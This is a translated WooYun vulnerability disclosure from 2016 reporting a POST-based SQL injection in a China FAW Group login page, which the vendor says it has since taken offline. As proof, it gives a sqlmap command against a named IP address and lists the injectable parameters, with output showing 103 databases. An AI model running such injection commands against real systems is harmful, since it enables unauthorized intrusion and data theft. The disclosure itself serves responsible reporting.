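Vulnerability Summary
Bug ID: wooyun-2016-0171182
Title: POST injection in a system of China FAW Group Corporation (103 databases)
Affected vendor: China FAW Group Corporation
Author: 头晕脑壳疼
Submitted: 2016-01-20 15:26
Fixed: 2016-01-21 14:28
Disclosed: 2016-01-21 14:28
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 12
Status: Fixed by the vendor
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2016-01-20: Details reported to the vendor; awaiting vendor handling
2016-01-21: Vendor confirmed; details disclosed to the vendor only
2016-01-21: Vendor fixed the vulnerability and disclosed it voluntarily; details released to the public
Brief description:
Detailed description: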
sqlmap -u "http://218.62.24.136/checklogin.asp" --data "login=111111&password=111111&login=111111&UserCode=111111"
available databases [103]:
A single database alone contains more than a thousand tables.
Proof of vulnerability:
sqlmap -u "http://218.62.24.136/checklogin.asp" --data "login=111111&password=111111&login=111111&UserCode=111111"
available databases [103]:
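A single database alone contains more than a thousand tables.
Remediation:
Copyright notice: when reposting, please credit the source 头晕脑壳疼@乌云
Vulnerability Response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2016-01-21 14:28
Vendor reply:
This service had already been taken offline, but its Internet access was not closed in time. Internet access has now been closed. Thank you for your attention and support.
Latest status:
2016-01-21: This service had already been taken offline, but its Internet access was not closed in time. Internet access has now been closed. Thank you for your attention and support.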